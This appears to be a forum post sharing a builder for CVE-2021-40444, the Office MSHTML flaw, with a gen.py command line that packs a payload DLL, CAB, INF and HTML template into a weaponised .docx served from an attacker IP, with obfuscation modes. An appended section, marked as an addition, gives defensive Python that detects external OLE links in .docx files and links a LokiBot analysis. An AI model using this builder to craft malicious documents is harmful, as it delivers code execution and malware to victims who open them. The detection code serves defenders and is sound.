CVE-2021-40444
Usage
Run setup.sh first, as you will need a few directories. Once you have run the script, you should be able to run gen.py with the example given:
Code:
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flags
-d -> The .docx file that has already been modified with a Bitmap Object, whether in the header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra: comes with 3 modes (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
Notes
- http.server will be served from the web directory. This directory will contain 3 files:
  - .cab
  - .html
  - .docx
boom!...
For better understanding:
LokiBot Campaign Targets Microsoft Office Document Using Vulnerabilities and Macros | FortiGuard Labs
FortiGuard Labs investigates malicious Microsoft Office documents that dropped the LokiBot malware onto a victim's system. Get an analysis of the intricacies of this threat and awareness of its ope…
www.fortinet.com
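A defender-side check for the kind of document the -d flag describes, added here as an example that is not part of the original post or of the gen.py project: it lists external OLE object relationships in the document, header and footer parts of a .docx, and because it parses the relationships XML instead of searching raw bytes, a target written as character references (the HTML Entity mode of -obf) comes back decoded. It assumes the remote reference is stored as an external oleObject relationship; the function names, the sample archive and the 192.0.2.10 address are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_ole_targets(docx_bytes):
    """Return (rels part, decoded target) for each external OLE relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            # document.xml, headerN.xml and footerN.xml each have their own .rels part
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            try:
                root = ET.fromstring(zf.read(name))  # resolves &#x..; references
            except ET.ParseError:
                # A relationships part that will not parse is itself worth a look
                findings.append((name, "<unparsable relationships part>"))
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_TYPE:
                    findings.append((name, rel.get("Target", "")))
    return findings


def _rels(rel_type, target, mode=""):
    # Minimal relationships part with a single entry (constructed test data)
    return ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="%s" Target="%s"%s/></Relationships>'
            % (REL_NS.strip("{}"), rel_type, target, mode))


def constructed_sample():
    """Constructed in-memory archive: one benign image link, one external OLE link."""
    encoded = "".join("&#x%x;" % ord(c) for c in "http://192.0.2.10/sample.html")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels",
                    _rels(OLE_TYPE.replace("oleObject", "image"), "media/image1.png"))
        zf.writestr("word/_rels/header1.xml.rels",
                    _rels(OLE_TYPE, encoded, ' TargetMode="External"'))
    return buf.getvalue()


if __name__ == "__main__":
    for part, target in external_ole_targets(constructed_sample()):
        print(part, "->", target)
```

Legitimate documents can also contain linked OLE objects, so treat a hit as a reason to review the target, not as a verdict.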
----------------------------------------------------------------------------
Link: